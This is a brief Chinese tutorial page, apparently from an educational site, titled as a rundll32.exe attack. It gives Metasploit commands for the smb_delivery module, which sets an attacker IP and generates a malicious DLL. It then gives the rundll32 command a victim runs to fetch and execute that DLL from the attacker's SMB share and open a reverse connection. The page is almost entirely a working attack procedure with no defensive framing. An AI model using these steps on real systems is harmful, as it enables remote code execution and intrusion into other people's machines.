数据结构
网络
关系型数据库管理系统
操作系统
Java
MS Excel
iOS
HTML
CSS
Android
Python
C 编程
C++
C#
MongoDB
MySQL
JavaScript
PHP
物理学
化学
生物
数学
英语
经济
心理学
社会研究
时尚研究
法律研究rundll32.exe 攻击
Rundll32.exe 与 Windows 操作系统关联,它允许你调用 16 位或 32 位 DLL 中导出的函数,并将函数存储在合适的内存库中。
通过 SMB 发起 rundll32 攻击
Metasploit 包含“SMB 投递”模块,它生成恶意 dll 文件。此模块通过 SMB 服务器传送 payload,并提供命令以检索和执行生成的 payload。
生成 DLL payload
- use exploit/windows/smb/smb_delivery
- msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(攻击者 IP)
- msf exploit(windows/smb/smb_delivery) > exploit
现在,你可以使用 rundll32.exe 在受害者机器上执行此生成的恶意 dll 文件,然后在你的机器上获取反向连接。
rundll32.exe \192.168.1.109\vabFG\test.dll,0
更新于: 2020-09-23
564 次查看
广告